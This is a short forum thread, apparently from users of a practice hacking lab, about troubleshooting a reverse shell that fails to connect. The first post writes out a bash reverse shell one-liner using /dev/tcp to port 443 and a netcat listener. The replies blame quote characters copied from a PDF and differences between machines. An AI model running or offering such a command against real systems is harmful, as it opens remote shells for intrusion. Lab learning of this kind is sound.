i have gotten to the point where i need to get a reverse shell.
i setup up a nc listner on port 443 on new terminal, and then entererd the bash command
(bash -c “bash -i >& /dev/tcp/{your_IP}/443 0>&1” ) with my ip.
but when i run the reverse shell it says no output and nc does not pick up anything?
ive ran into problems with reverse shells on some of the other starting point machines.
any help is greatly appreciated!!!
Ami me pasaba igual y revisando el codigo del pedf , tenia algo equivocado .
Compara los dos codigos del pdf capas alguna cosa pequeña esta equivocada ( “,’)
on both computer i copied / pasted the commands from the pdf. only replacing my ip address which was the same on both. still only worked on one computer.
im using windows 10 on all of my machines. i think i know its something with my laptop now.
i tried my personal laptop on my work’s network…didnt work.
i tried my work laptop on my home network …worked fine
tried my desktop on my home network…worked fine
problem is i want to use my personal laptop for everything HTB related.
no not yet.
so i tried again today on my personal laptop at work . and it worked.
which confuses the ■■■■ out of me because i am copy & pasting the same commands and just replacing the session cookie and taget ip where needed.
So here are 2 things that I learned during my journey,
things will never work at first try and you suddenly make another copy paste that change everything and works. I assuming something change but I have no idea what
Asks gpt next time, he is very good for that.